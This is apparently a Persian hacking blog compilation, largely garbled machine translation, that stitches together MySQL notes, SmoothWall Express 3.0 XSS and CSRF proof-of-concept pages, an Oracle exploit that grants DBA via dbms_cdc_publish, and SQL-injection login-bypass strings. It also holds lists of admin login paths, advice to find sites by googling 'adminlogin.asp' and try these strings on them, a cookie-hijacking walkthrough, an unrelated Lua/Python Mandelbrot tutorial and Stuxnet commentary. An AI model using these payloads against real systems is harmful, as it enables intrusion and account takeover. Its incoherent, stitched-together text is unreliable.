سیستم مدیریت پایگاه اطلاعاتی
روش اتصال به MySQL
با دستورزیر به MySQL متصل می شود
یاازدستورMySQL_queryاستفاده کنید
این تابع MySQL_connect سه آرگومان دارد
1-میزبان
2-شناسه کاربرى
3-کلمه عبور
اگر در مرورگر پیام خطا دهد بادستورزیر پایگاه اطلاعاتی مورد نظر انتخاب خواهد شد
ایجادپایگاه اطلاعاتی
حال شما بعد ازجاسازی خود تان امادهید برای استخراج اطلاعات پایگاه هدف
1-باید query به زبان SQL می نویسید وسپس این query با استفاده ازدستور
2-عملیات لازم را بر روی پایگاه اطلاعاتی هدف فرم فوق به شکل زیر است
3-ایجاد جدول
4-برای ارسال دادهها به بانک اطلاعاتی
5-بازیابی اطلاعات
6-تغییر اطلاعات
<p><br /><textarea cols="58" rows="16" name="3"><p><a href= "http:///" rel="nofollow"><b style="color :black;background -color :#ffffff">???? ?? ?? ?? ?????? ??</b> <b style="color :black;background -color :#a0ffff">????</b> – ???? ???</a></p>
<?php comments_number (‘<a href="#respond">No Comments »</a>’, ‘<a href=" #comments">1 Comment »</a>’, ‘<a href="#comments">% Comments »</a>’); ?>
</textarea></p>
توجه داشته باشید که کد پایانی کد واقعی نیست
اعتبار سنجی ورودی نامناسب و ان نتیجه ان XSS مختلف در انواع کد از تزریق از جمله و در برخی موارد می توان برای phish اعتبار کاربر و یا مخرب پخش کند .
<form method='get' action='index.php'>
<input name="search" value="<?php echo $_GET['search'];?>" />
<input type=submit name='getdata' value='Search' /></form>
اتصال روتر به شبکه Triolan
اکسپرس آسیب پذیری چندگانه
Express 3.0 is vulnerable
to xss and csrf.
xss example:
<html>
<title>Download</title>
<body>
<form action="http://192.168.0.1:81/cgi-bin/ipinfo.cgi"; method="post"
id="xssplz">
<input type="hidden" name="IP" value='"<script>alert(1);</script>'></input>
<input type="hidden" name="ACTION" value='Run'></input>
</form>
<script>document.getElementById("xssplz").submit();</script>
</body>
csrf example:
<html>
<title> SmoothWall Express 3.0 csrf </title>
<body>
<form action="http://192.168.0.1:81/cgi-bin/shutdown.cgi";
method="post" id="csrfplz">
<input type="hidden" name="ACTION" value='Reboot'></input>
</form>
<script>document.getElementById("csrfplz").submit();</script>
</body>
Inject SQL
در
پایگاه داده Oracle
اوراکل بزرگترین برنامه ساخت پایگاه داده و بانک اطلاعاتی می باشد
این پایگاه نسبت به برنامه هایی مانند Access و SQL Server خیلی قویتر است
مجموعه ساختار های حافظه و پردازشهای مربوط به انجام
وظایف Oracle Instance میگویند
و به مجموعه این Instance و بقیه اجزاء Oracle Database میگویند
زمانی که شما درخواست یک سری دادههای مشخص از اراکل را توسط یک Sql Select انجام میدهید
دستورات به گونهای است که شما درخواست اطلاعات دلخواه خود را صاذر میکنید
خروجی این دستورات باید یرای اراکل قابل فهم باشد
این کار توسط
Relational Database Management System
که همان RDBMS میباشد انجام میشود
RDBMS دستورات SQL شما را به گونهای برای اراکل که قابل فهم باشد ترجمه میکند
مراحل پردازش به صورت زیر میباشد
Search Shared Pool
* RDBMS ابتدا سعی میکند که یک کپی از SQL ترجمه شده را در Library Cache پیدا کند
Validate Statement
* درستی دستورات SQL را که توسط کاربر اجرا شده است را چک میکند.
Validate Data Source
RDBMS مطمئن میشود که تمام سطرها و ستونهای که کاربر دز دستورش به آنها اشاره کرده است وجود داشته باشد
نسخه های آسیب پذیر :
اوراکل پایگاه داده سرور
* 10gR1 نسخه ، 10gR2 ، 11gR1 و 11gR2
روش
ذخیره جاوا وضعیت آسیب پذیری اجرای Remote Code
این آسیب پذیری به شما اجازه می دهد
تا از Remote به خارج از Sandbox جاوا پیاده سازی پایگاه رابطهای توسط اوراکل را به شکند
* و احراز هویت کند
که کاربر باید قادر به ایجاد روش های ذخیره شده جاوا باشد و حل مسئله مورد نیاز کند
-------
as SCOTT User:
create or replace function pwn return varchar2 authid current_user is
PRAGMA autonomous_transaction;
BEGIN
execute immediate 'grant dba to scott';
commit;
return 'z';
END;
-
grant execute on SCOTT.pwn to public
-
begin
sys.dbms_cdc_publish.create_change_set('a','a','a"||SCOTT.pwn()||"a','Y',sysdate,
sysdate);
end;
------
The exploit is already available in metasploit : Thanks to MC
This affects 10gR1, 10gR2, 11g R1 and 11gR2. I agree with Appsec Inc that the CVSS score should be 7.5 and not 4.9 which oracle has assigned to it.
برای ارسال نظرات کاربر
SQLite
Shoutbox
روش ساخت باکس
<html>
<head>
<title>XSS attack demo</title>
<script src="http://code.jquery.com/jquery-1.4.2.min.js"></script>
<link rel="stylesheet" type="text/css" href="css.css" />
</head>
<body>
<div id="container">
<h1>Shoutbox</h1>
<p>Use widgets:
<a href="?widget=zoom.js">zoom.js</a> <a href="?widget=shout.js">shout.js</a> </p>
<h2>Add your comment</h2>
<form action="shoutbox.php?widget=" method="post">
Author: <br /><input name="author" value="me" /><br />
Comment: <br /><textarea name="comment"></textarea><br />
<small>Your IP: 127.0.0.1</small><br />
<p><button type="submit"><strong>Add comment</strong></button></p>
<p><a href="?clear=1">Delete your comments</a></p>
</form>
<p>
<strong>Disclaimer:</strong> This page is a demonstraction of XSS attack. IT MAY CONTAIN MALICIOUS CODE (if somebody injects it), be careful!
<br />For more info see <a href="اردرس وبلاگ/">the blog</a>
</p>
</div>
</body>
</html>
<!--
{/ایمیل وبلاگ/}
-->
* ذخیره سازی Sqlite برای ارسال نظرات کاربر
* نظرات شما تنها قابل مشاهده برای آی پی خود شماست
* شامل جاوا اسکریپت های
<p><a href= "http://abdc.persianblog.ir/" rel="nofollow"><b style="color :black;background -color :#ffffff">???? ?? ?? ?? ?????? ??</b> <b style="color :black;background -color :#a0ffff">????</b> – ???? ???</a></p>
<?php comments_number ('<a href="#respond">No Comments »</a>', '<a href=" #comments">1 Comment »</a>', '<a href="#comments">% Comments »</a>'); ?>
* منبع باز
* 100 ٪ گذاشتن تزریق آزاد
* 99 ٪ 98 ٪ XSS ؛-) رایگان
* فقط افزودنیهای مرورگرهای آسیب پذیر هستند
بروز رسانی :
من در بر داشت vuln دوم :) پس ، در حال حاضر دو وجود دارد :
درجه افزودنیهای تنها ا بسیار ساده برای بهره برداری از آن همه چیز در مورد غیر معمول نحو جاوا اسکریپت
سخت این یکی است ،
اینترنت اکسپلورر
و گونه های مختلف خود را برای IE8). این یکی به طور گسترده ای شناخته شده است ، اما نیاز به یک وب سایت جداگانه برای بهره برداری.این اطلاعات مربوط به هدر یا عدم آنها است
شکل کار نرم ابزار
شامل
اضافه کردن دکمه های
بزرگنمایی
به سادگی با عبور فایل جی اس را در پارامتر آدرس عنصر
علیه XSS -- هر ورودی کاربر / محتوا پایگاه داده htmlspecialchars ()
علیه تزریق گذاشتن -- 100 ٪ به عنوان اظهارات آماده حفاظت شده استفاده می شود
SQLite
پایگاه داده کوچک که قالب Library و به زبان C نوشته شده است
و از پایگاه دادههای RDBMS به حساب میآید
یکی از مکانیسم های حمله مورد استفاده توسط هکرها به سرقت اطلاعات است
شاید یکی از رایج ترین کاربرد تکنیک های حمله لایه است
این نوع حمله ازاستفاده نادرست از برنامه نویسی از برنامه های کاربردی وب است
که به هکر اجازه می دهد تا با تزریق دستورات SQL را در قالب فرم ورود به آنها اجازه دسترسی به پایگاه داده
در داخل پایگاه داده خود را به دست آورد
SQL تزریق :
در ExplanationWeb اجازه می دهد برنامه های کاربردی بازدید کنندگان
وب سایت برای ارسال و بازیابی داده ها به / از پایگاه داده
بر روی اینترنت با استفاده از مرورگر وب خود
پایگاه داده ها در وب سایت های مدرن
ذخیره اطلاعات مورد نیاز برای وب سایت
ارائه محتوای خاص به بازدید کنندگان
و ارائه اطلاعات به مشتریان
روش تزریق SQL هک
تلاش برای تصویب دستورات SQL از طریق برنامه وب برای هک
به وسیله بخش مدیریت پایگاه داده است
اگر بخوبی بررسی نه شوند برنامه های کاربردی وب ممکن است
در حملات تزریق SQL که به هکر اجازه دهد برای نمایش اطلاعات از بانک اطلاعاتی و یا حتی آن را محو کند
ویژگی های مانند صفحه ورود به سیستم
پشتیبانی و محصول فرم درخواست
فرم های بازخورد
صفحات جستجو
ویژگی های اینگونه وب سایت مستعد به حملات تزریق SQL
به کاربر اجازه ورود می دهد از طریق پرس و جو عبور به طور مستقیم
تزریق ساده SQL : ExampleTake
صفحه ورود ساده کاربر
نام کاربری
کلمه عبور
مشاهده اطلاعات شخصی
ارسال نظرات
1- هنگامی که کاربر اطلاعات خود را تسلیم پرس و جوی SQL و جزئیات را مشاهده کند
2- ایجاد بانک اطلاعاتی برای تایید
3- ارتباط با پایگاه داده از طریق یک سری از دستورات برنامه ریزی شده تا به عنوان نام کاربری و ترکیب کلمه عبور خود را بررسی کند
هکر ممکن است از طریق تزریق SQL ورودی با دستورات SQL قصد دور زدن
فرم حفاظتی ورود سایت دستکاری شده و دیدن آنچه که در پشت آن نهفته است
این فن آوری آسیب پذیر را با
زبان های اسکریپت پویا
ASP.NET -- پی اچ پی -- JSP -- CGI و--
و مهاجم نیاز به انجام تزریق SQL هک سادگی محض در ان از SQL تزریق باعث تقویت محبوبیت آن است
صلیب اسکریپتی سایت چیست؟
هکر دائما با تکنیک های XSS و یا CSS هکینگ وسیعی که دارد
و عموما تصور می شود کراس سایت یکی از شایع ترین روش کاربردی تکنیک های هک است
و روش فوق که leverages آسیب پذیری در کد برنامه وب
برای ارسال و جمع آوری برخی از انواع اطلاعات از قربانی
نهان مسئله این است که mistrusted محتوا را
می توان به یک صفحه پویا معرفی کرد
نه سایت و نه اطلاعات کابری و اقدامات حفاظتی
صلیب سایت به مهاجم اجازه می دهد تا جاوا اسکریپت
VBScript اکتیو ایکس ، اچ و یا فلش را به صفحه های آسیب پذیر پویا جاسازی به قربانی
اجرای اسکریپت بر روی صلیب سایت خود را به منظور جمع آوری اطلاعات
و استفاده از XSS و سرقت کوکی ها ایجاد درخواست های که می تواند برای کسانی که کاربر معتبر
و یا اجرای کدهای مخرب در سیستم داده ها
حاوی لینک های مخرب محتوا و فرمت شده است
که بیش از هر وسیله ممکن است در اینترنت پخش شده
و توزیع سفارشی گردد CSS آدرس فقط با استفاده از یک مرورگر را تست پاسخ وب سایت پویا
مهاجم نیز نیاز به دانستن بعضی از اچ ، جاوا اسکریپت و زبان پویا
برای تولید یک آدرس ویا لینک کردن به منظور حمله به وب سایت XSS آسیب پذیر
هر صفحه که قربانی ان را کلیک کند پارامترهایی را برای پایگاه داده می تواند
آسیب پذیر به این روش است
اشکال در ورود است رمز عبور را فراموش کرده اید و غیره...
قالبا اشاره کاربربه صلیب سایت اسکریپتی به عنوان CSS یا XSS است
که می توان با شیوه آبشاری CSS اشتباه گرفته شده
گوگل هکینگ
گوگل هکینگ اصطلاحی است که هکر تلاش می کند
با استفاده از موتورهای جستجو گوگل
و هک کردن پایگاه داده GHDB پایگاه داده نمایش داده شد
که تشخیص داده های حساس می باشد
هکر با راه اندازی سایت خود گوگل هک بانک اطلاعات نمایش داده شد
به طور مستقیم بر روی crawled محتوا
هک کردن پایگاه داده بطورپیش فرض http://johnny.ihackstuff.com
اطلاعات بیشتر در مورد هک گوگل را می توان از : http://www.informit.com/articles/article.asp؟p=170880&rl=1.
سایت شما بطورپیش فرض vulnerableInformation
دسترسی به مشاوران و آسیب پذیری های سرویس دهنده
پیام های خطا که حاوی اطلاعات بیش از حد
فایل حاوی کلمات عبور
دایرکتوری
صفحات حاوی پورتال لاگین
صفحات حاوی اطلاعات و یا آسیب پذیری شبکه مانند فایروال لاگ
برخی کلمات عبور مشترک
Acunetix!!
فایروال ها اس اس ال و با قفل کردن پایین سرورها acunetix در برابر هک !!!!!!!!
نرم افزار راه اندازی شد روی پورت 80 / 443 از طریق فایروال
http://www.acunetix.com/
Bypassing Login Screens (SMO+)
SQL Injection 101, Login tricks
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
....
Login as different user (SM*)
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
SQL Injection for admin
"/admin.asp"
"/login.asp"
"/logon.asp"
"/adminlogin.asp"
"/adminlogon.asp"
"/admin_login.asp"
"/admin_logon.asp"
"/admin/admin.asp"
"/admin/login.asp"
"/admin/logon.asp"
"/admin/adminlogin.asp"
"/admin/adminlogon.asp"
"/admin/admin_login.asp"
"/admin/admin_logon.asp"
"/administrator/admin.asp"
"/administrator/login.asp"
"/administrator/logon.asp"
"root/login.asp"
"admin/index.asp"
login With :
Community ID:´or´´=´
Password:´or´´=´
For beginers open google -
type adminlogin.asp-
and u see websites login pages, many of these sites accept the query 'or''='-
مکمل پایتون Lua یک زبان برنامه نویسی CSS اسکریپ
نسبتا کوچک ولی راحت وساده برای یادگیری برای psp می باشد
زبان پویا به عنوان پیتون است
اما Lua JIT آن را کامپایل به کد سیستم بسیار سریع
گاهی اوقات سریعتر نسبت به بسیاری از زبانهای دیگر
زمان اجرا با دقت برای تعبیه طراحی شده است
ماژول دودویی کامل Lupa
از جمله زمان اجرا آماری مرتبط LuaJIT2 است
تنها در بعضی از 500KB هستید در64 بیتی
با این حال ، کد Lua مشکل تر است برای نوشتن از کد پایتون
وبه عنوان زبان نوشتن برنامه های بزرگ های پایتون
که شامل
نوشتن برنامه های بزرگ در Lua است
زبان کامل پشتیبان هنگامی که با سرعت اولیه مهم تر از سادگی و ویرایش
کامپایل اجرا می چرخه خیلی سنگین هستند برای توسعه سریع.
Lupa کد سخت تر است برای نوشتن در پایتون بسیار سریع و در اطراف LuaJIT است
آن را آسان می کند به نوشتن کد پویا Lua که به همراه کد های پایتون توسط پویا سوئیچینگ
بین دو زبان در زمان اجرا ، بر اساس tradeoff بین سادگی و سرعت.
نمونه
>>> lua = LuaRuntime()
>>> lua.eval('1+1')
2
>>> lua_func = lua.eval('function(f, n) return f(n) end')
>>> def py_add1(n): return n+1
>>> lua_func(py_add1, 2)
3
حالا نمونه ای دیگراز coroutines Lua است
پیچیده هایی coroutine Lua رفتارش دقیقا مانند coroutine پایتون
ولی ابتدا ایجاد کنید
یا با استفاده از coroutine. () روش از یک تابع
و یا با ایجاد آن را در کد Lua. سپس
ارزش ها را می توان به آن فرستاده شده با استفاده از ارسال
متد () و یا می توان آن را بیش از iterated
... function(N)
... for i=0,N do
... coroutine.yield( i%2 )
... end
... end
... '''
>>> lua = LuaRuntime()
>>> f = lua.eval(lua_code)
>>> gen = f.coroutine(4)
>>> list(enumerate(gen))
[(0, 0), (1, 1), (2, 0), (3, 1), (4, 0)]
برای ایجاد coroutines در Lua و آنها پاس کردن عقب فضا درپایتون :
... function f(N)
... for i=0,N do
... coroutine.yield( i%2 )
... end
... end ;
... co1 = coroutine.create(f) ;
... co2 = coroutine.create(f) ;
...
... status, first_result = coroutine.resume(co2, 2) ; -- starting!
...
... return f, co1, co2, status, first_result
... '''
>>> lua = LuaRuntime()
>>> f, co, lua_gen, status, first_result = lua.execute(lua_code)
>>> # a running coroutine:
>>> status
True
>>> first_result
0
>>> list(lua_gen)
[1, 0]
>>> list(lua_gen)
[]
>>> # an uninitialised coroutine:
>>> gen = co(4)
>>> list(enumerate(gen))
[(0, 0), (1, 1), (2, 0), (3, 1), (4, 0)]
>>> gen = co(2)
>>> list(enumerate(gen))
[(0, 0), (1, 1), (2, 0)]
>>> # a plain function:
>>> gen = f.coroutine(4)
>>> list(enumerate(gen))
[(0, 0), (1, 1), (2, 0), (3, 1), (4, 0)]
مثال:
روش جدید در هک تابع احتمال
مبتنی محاسبه تصویر مندالبروت
قانون زیف−مندالبروت. تابع احتمال. تابع توزیع تجمعی
پارامترها, N \in \{1,2,3\ldots\} (طبیعی) q \in [0;\infty
) (حقیقی) s>0\, (حقیقی)
در موضوعات موازی و نمایش نتیجه در PIL
اجرای معیار برای کامپیوتر زبان معیار
lua_code = '''\
function(N, i, total)
local char, unpack = string.char, unpack
local result = ""
local M, ba, bb, buf = 2/N, 2^(N%8+1)-1, 2^(8-N%8), {}
local start_line, end_line = N/total * (i-1), N/total * i - 1
for y=start_line,end_line do
local Ci, b, p = y*M-1, 1, 0
for x=0,N-1 do
local Cr = x*M-1.5
local Zr, Zi, Zrq, Ziq = Cr, Ci, Cr*Cr, Ci*Ci
b = b + b
for i=1,49 do
Zi = Zr*Zi*2 + Ci
Zr = Zrq-Ziq + Cr
Ziq = Zi*Zi
Zrq = Zr*Zr
if Zrq+Ziq > 4.0 then b = b + 1; break; end
end
if b >= 256 then p = p + 1; buf[p] = 511 - b; b = 1; end
end
if b ~= 1 then p = p + 1; buf[p] = (ba-b)*bb; end
result = result .. char(unpack(buf, 1, p))
end
return result
end
'''
image_size = 1280 # == 1280 x 1280
thread_count = 8
from lupa import LuaRuntime
lua_funcs = [ LuaRuntime(encoding=None).eval(lua_code)
for _ in range(thread_count) ]
results = [None] * thread_count
def mandelbrot(i, lua_func):
results[i] = lua_func(image_size, i+1, thread_count)
import threading
threads = [ threading.Thread(target=mandelbrot, args=(i,lua_func))
for i, lua_func in enumerate(lua_funcs) ]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
result_buffer = b''.join(results)
# use PIL to display the image
import Image
image = Image.fromstring('1', (image_size, image_size), result_buffer)
image.show()
چگونگی ربودن خودکار کوکی صفحه ی درحال اجرا
روش این حمله
این حمله می تواند از طریق تعدادی از مکانیسم از جمله
از طریق محلی یا شبکه سیمی به بی سیم
از طریق ربودن dnS رخ می دهد
از طریق شبکه روتر
یا از طریق کابل شبکه مودم adsl
مراحل عمل به شرح زیر است :
1. کش رفتن dnS در تمام پرس وجو های شبکه برای به دست آوردن نقشه
از آنچه نام میزبان وکاربران فی ت سازی شده اند
بنابراین شما می دانید میزبان پلیس عراقی برروی سرورخود دارد
2. هنگامی که ip کلاینت متصل به آی پی سرور با استفاده از پورت 443
نام میزبان که در کش dnS به پاک کند
3. اضافه کردن این حوزه به عنوان یک هدف برای ip کلاینت کوکی
4. هنگامی که ip آن به وب سایت http هر گونه ارتباط نشت کردن به آنچه هدف آن جمع شده اند
و به صورت اختیاری اضافه کردن در لیست اهداف کاملا سفارشی
برای ثبت سایت خود و نا امن کردن mail.yahoo.com و mail.live.com
ادرس دارکردن تصاویرپیش فرض و تزریق کوکی برای هر یک از این که به اتصال TCP.
5. هنگامی که مرورگر بازخوانی این تصاویر پیش فرض
آن همه کوکی ها برای نا امن است که دامنه و مسیر را منتقل کنند
واتفاقی که می افتد رکورد کوکی ها منجر به و هر گونه
ما دیگران را برای دیدن در حالی که ما در آن هستیم
را به کوکی افزودنیهای سازگار با فایل.
6.کلمات کلیدی
اینجا باید توجه کرد که ابزار به طور خودکار سایت های نا امن کرده
مثال نه فقط جیمیل. این کار فایل پیکربندی مورد نیاز مشترک کلمات کلیدی
این بدین معنی است که شما پشت ابهام پنهان کلمات کلیدی!
واگر SSL خود را کمی شنیده شود اگر کوکی های خود را تنظیم نشده باشد.
که مرروگر لیست انتخابی اضافی از سایت های کاملا ناامن و ربودن همیشه
کاربران بدین معنی است که سایت های محبوب که به طور کامل حاضر
به اجرای incentivized اس اس ال در حال حاضر به انجام این کارند
از آنجا که بسیاری از سایت های آسیب پذیر هستند به احتمال زیاد
واقعی احتمالا رفتن تحت به شانه از کاربران می گیرند
برای چک کردن سایت های خود را تحت فایرفاکس
به زبانه حریم شخصی در پنجره ترجیحات
و کلیک بر روی "نمایش کوکی ها".
برای یک سایت داده می شود
بازرسی از کوکی ها برای فردی به نام سطح بالا از سایت
نام دامنه میزبانی و اگر هر کدام از "ارسال برای : ارتباطات رمز شده
آنها را حذف کنید. سپس به سایت خود برای دیدار دوباره امتحان کنید
اگر هنوز هم شما اجازه می دهد تا در ، سایت نا امن ارتباطات رمز شده است
اطلاعات تان به سرقت رفته است
توجه داشته باشید که برخی از سایتها انجام کارهای janky مانند نیاز به جلسه تصادفی آیدی در آدرس اینترنتی ، اطلاعات ارجاع می شود درست است ، پنهان و یا عناصر فرم را برای حضور در ناوبری. این کار ممکن است در نهایت جلوگیری از آزمون فوق ساده به شما این امکان از در ، با وجود داشتن ناامن کوکی ها.
این روش ممکن است یا نا ممکن است
حال به این دلیل بهتر است برای تماس با این سایت ها به هر حال
نوع جدیدی از تروجان Stuxnet ، گسترش می یابد که از طریق دستگاه های ذخیره سازی کپی کرد و حامل امضای دیجیتال از شرکت Realtek نیمه هادی ، یکی از بزرگترین تولید کنندگان قطعات کامپیوتر و مدارهای یکپارچه شده
نرم افزار امضا دیجیتالی به طور خودکاردرسیسم سالم به عنوان طبقه بندی شده "پاک" و حتی برنامه های به ان افزوده شده به لیست "قابل اعتماد" (لیست سپید). برای راه حل آنتی ویروس ،
نرم افزارهای جاسوسی صدور گواهینامه
اول - با استفاده از نرم افزارهای جاسوسی " صفرروز" در نتیجه ، آنتی ویروس دفاعی برای آن آماده نکرده
دوم - نرم افزارهای جاسوسی که موفق به فریب دادن سیستم های رایانه های شخصی با استفاده از امنیت واقعی نه جعلی با گواهینامه دیجیتالی اجرایی عضو SSD صدور گواهینامه از شرکت های Realtek JMicron
سوم - نرم افزارهای به نام دادن اجازه برای نصب خودکار نرم افزارهای جاسوسی ازمایکروسافت
این امکان پیش فرض وجود دارد که کد های مورد استفاده برای ایجاد گواهینامه دیجیتالی به سرقت رفته که گواهی نامه ایجاد شده
Stuxnet استفاده می کند
گواهینامه معتبر
درایورهای مخرب گواهی صادر شده شرکت های Realtek JMicron قانونی را امضا کردند
که هر دو شرکت دارای دفاتری تایوان
مانند لب تاب های با برندهای مختلف شامل
دل سونی توشیبا ایسر آی بی ام اپل ایسوس اچ پی کامپک و زیمنس
خطر بالاتر از خطر نفوذ Stuxnet
کاربرانی که لپ تاپ های جدید با چیپست اینتل را خریداری می کنند
با این مشکل مواجه هستند که وقتی ما سعی می کنند ویندوز XP (32و64 بیت) و یا ویندوز سرور2003 را به روی نوت بوک خود نصب کنیم اغلب پیغام می دهد :
که سیستم عامل به صورت خودکار نمی تواند هارد دیسک لپ تاپ شما را که با پورت Intel S-ATA AHCI و یا Intel SATA RAID به مادربورد نوت بوک متصل است شناسایی کند. بنابراین از شما درخواست می کند که با فشردن دکه F6 و نصب درایورهای legacy واگر این امکان پیش فرض وجود دارد که کنترلر هایی که با این مشکل مواجه هستند
که شامل خانواده (ICH6R, ICH7R, ICH8R and ICH9R) برای دسکتاپ ها و (ICH6M, ICH7M, ICH8M and ICH9M) برای نوت بوک هاست پس باید مانول در بسته نوت بوک تان مراجعه کنید و با خواندن مشخصات فنی از این موضوع اطلاع پیدا کنید
وتاره متوجه مب شوید که از کانکتورهای JMicron S-ATA استفاده می کند پس باید ابتدا مطمئن شوید که لپ تاپ شما مستقیما به کانکتورهای چیپست اینتل متصل شده باشد اگر این شکل نباشد باید همچنین از JMicron textmode drivers استفاده کرد و انها را به سی دی بوتیبل XP اضافه کرد
این درایور خطر نفوذ Stuxnet از لینک
کد:
ftp://driver.jmicron.com.tw/jmb36x/Win2k_xp_Vista
بعد ازنصب درایور از شما SSD صدور گواهینامه می خواهد
Cyber Warfare
Win32/Stuxnet
Stuxnetاهداف سیستم های نظارتی ایران در آمریکا
با توجه به گسترش جغرافیایی کرم Stuxnet نفوذ بالایی از خطر در ایالات متحده ، احتمالا به دلیل حمله و هدف قرار داده که هدف آن جاسوسی صنعتی می باشد Win32/Stuxnet
ایالات متحده آمریکا — ۵۷٫۷۱ ٪
ایران — ۳۰،۰۰ ٪
روسیه — ۴،۰۹ ٪
استفاده از نرم افزارهای جاسوسی ” صفرروز” در نتیجه ، آنتی ویروس دفاعی برای آن آماده نکرده ان را جاسوسی صنع….
